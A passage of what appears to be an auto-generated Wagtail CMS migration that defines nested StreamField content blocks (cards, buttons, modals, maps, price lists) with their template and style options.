wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), ('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], label='Content'))])), ('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will 